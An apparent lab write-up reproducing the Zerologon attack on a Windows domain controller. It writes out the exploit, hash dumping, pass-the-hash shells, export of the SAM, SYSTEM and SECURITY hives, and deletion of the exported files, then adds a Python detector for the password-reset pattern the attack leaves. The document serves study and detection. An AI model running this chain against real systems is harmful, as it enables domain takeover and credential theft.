CVE-2020-1472-ZeroLogon
Reproduction
Check whether the DC is vulnerable to Zerologon
python3 zerologon_tester.py ad01 192.168.145.134
Performing authentication attempts...
Success! DC can be fully compromised by a Zerologon attack.
Set the DC machine account password to empty
python3 cve-2020-1472-exploit.py ad01 192.168.145.134
Obtain the hashes
python3 secretsdump.py redteam.club/ad01\$@192.168.145.134 -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6:::
Log in with wmiexec.py
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 administrator@192.168.145.134 "whoami"
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9099d68602a60f007c227c4fa95fada6 redteam.club/administrator@192.168.145.134 // get a shell using the hash
python3 wmiexec.py administrator:p-0p-0p-0@192.168.145.134 // get a shell using the plaintext password
Export the SAM
reg save HKLM\SYSTEM system.save # export the registry hive
reg save HKLM\SAM sam.save # export the registry hive
reg save HKLM\SECURITY security.save # export the registry hive
get system.save # download to the local machine
get sam.save # download to the local machine
get security.save # download to the local machine
del /f system.save # delete the exported hive file on the remote host
del /f sam.save # delete the exported hive file on the remote host
del /f security.save # delete the exported hive file on the remote host
exit
Extract the hashes from the exported hives
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Restore the original machine account password (hash)
python3 reinstall_original_pw.py ad01 192.168.145.134 3730c3ee5ccba0338506ab75e84cf8fe081d4ca661528e33749053c79000926eb280815645ba53a15b058820dd301abf33f82edba4b5a9ae49229714c4329e7bf0ba3e75b9b92cf294cd456bc195b93b1c7946b51d276e5c91c33545109acfcc72afca6fb12872f2170410bc5a9feefec4764d608751a47213faca4fdca2bbc4509a9e3b22aeb9e2d57acb3f3466d3f4c286e4b0fbec9a98b16237c9d5072963136b61a20c52ae0b4cc5e534a55bd31afc94482f1e73c87e9f00d3af41f06e50db549baa939e7028d52e189b01c3f5950ce07f7a882212db6fc27958a34e485980172f76117ea40b01b84ea9a878ef80
Verify the domain administrator hash
python3 secretsdump.py ad01.redteam.club/administrator@192.168.145.134 -hashes :9099d68602a60f007c227c4fa95fada6
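From the defender's side, the procedure above leaves a distinctive trace: the DC's machine account password is changed twice within minutes (set to empty, then restored), by a principal that is not the DC itself, whereas normal rotation is self-initiated. The following added example (not part of the original write-up) flags that reset/restore pair over constructed, simplified security-log records; the record layout, the DC account name and the ANONYMOUS LOGON subject are assumptions, not real Windows event XML.

```python
"""Flag a DC machine-account password reset followed by a second reset
shortly after, the pattern produced by the Zerologon set-empty/restore steps."""
from datetime import datetime, timedelta

# Constructed, simplified records (assumed layout, not real event XML).
# Event ID 4742 = "A computer account was changed"; the exploit's reset shows
# up as a change to the computer account's Password Last Set attribute.
SAMPLE_EVENTS = [
    {"time": "2020-09-20T10:00:03", "event_id": 4742, "target": "AD01$",
     "subject": "ANONYMOUS LOGON", "password_last_set_changed": True},
    {"time": "2020-09-20T10:00:05", "event_id": 4624, "target": "ADMINISTRATOR",
     "subject": "-", "password_last_set_changed": False},
    {"time": "2020-09-20T10:07:41", "event_id": 4742, "target": "AD01$",
     "subject": "ANONYMOUS LOGON", "password_last_set_changed": True},
    # benign: a workstation rotating its own machine password (subject == target)
    {"time": "2020-09-21T02:00:00", "event_id": 4742, "target": "WS07$",
     "subject": "WS07$", "password_last_set_changed": True},
]

DC_ACCOUNTS = {"AD01$"}  # machine accounts of the domain controllers (assumed)


def find_dc_password_resets(events, dc_accounts=DC_ACCOUNTS):
    """Return 4742 events where a DC machine account's password was changed
    by a principal other than the DC itself (self-initiated rotation is normal)."""
    hits = []
    for e in events:
        if e["event_id"] != 4742 or not e["password_last_set_changed"]:
            continue
        if e["target"] in dc_accounts and e["subject"] != e["target"]:
            hits.append(e)
    return hits


def find_reset_pairs(events, window=timedelta(hours=1), dc_accounts=DC_ACCOUNTS):
    """Pair consecutive suspicious resets of the same DC account within
    `window`: the set-to-empty step followed by the restore step."""
    hits = find_dc_password_resets(events, dc_accounts)
    pairs = []
    for a, b in zip(hits, hits[1:]):
        ta = datetime.fromisoformat(a["time"])
        tb = datetime.fromisoformat(b["time"])
        if a["target"] == b["target"] and timedelta(0) <= tb - ta <= window:
            pairs.append((a["time"], b["time"], a["target"]))
    return pairs


if __name__ == "__main__":
    for first, second, acct in find_reset_pairs(SAMPLE_EVENTS):
        print(f"possible Zerologon reset/restore on {acct}: {first} -> {second}")
```

A single reset without a restore is still worth alerting on; the pair check only raises confidence, since an attacker who never restores the password leaves the DC's Netlogon channel broken (Event ID 5805 failures) instead.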